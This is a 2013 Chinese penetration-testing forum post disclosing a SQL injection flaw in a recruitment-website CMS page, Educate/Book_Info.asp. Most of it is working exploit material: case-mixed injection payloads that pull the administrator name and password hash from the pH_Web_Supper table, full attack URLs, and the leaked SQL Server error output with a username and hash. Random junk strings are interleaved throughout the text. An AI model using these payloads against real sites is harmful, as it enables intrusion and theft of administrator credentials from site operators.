中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版注入 [打印本页]

作者: admin    时间: 2013-2-16 21:44
标题: 网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp
1 K  C8 Y; x, T$ x- d' ~( ]1 O) B ! R9 V5 i3 ^7 M& ^) o
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
. G9 Z& `  E* }$ q4 v7 E0 y
9 P3 Z% h! B$ h" U8 d6 D8 ]exp:如下. ^3 Q$ d8 D3 i& N5 U
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
, B& R4 Z- P$ ]9 X! s查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
2 D) \9 Z7 }1 v% z8 W7 v
7 l4 p( W, t5 L" i( A* s+ g0 thttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
. f( [0 V; o3 m+ Z  k2 S 5 ^! }$ R. E! C. p
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'  d4 r5 g" `1 q$ ]+ I9 |: N
6 k# K- T  {/ u* [; U
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。( ~! O( c5 \7 P+ @3 ~# _2 ]

3 _: A6 K; s$ N0 l0 Q$ \/ d7 f/Educate/Book_Info.asp,行 8! a" l% L. {9 d3 D" q# t

' o: }1 i: Y% f& ]& Q! ehttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)& s! z  p; s# b* t; `
$ ^! I- T/ g$ x4 ]' N  P
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
( r! m' n2 s4 S3 z% L3 k* z
! Q! J: {" X  m0 z. H将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。" G; f) b. Z9 U2 ?! @  f% P7 \

; ^1 G$ n: `5 c% g+ s, P. x9 G9 S/Educate/Book_Info.asp,行 8, j; D3 ?8 |- H( T: ~+ x$ q6 M& ?/ a





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2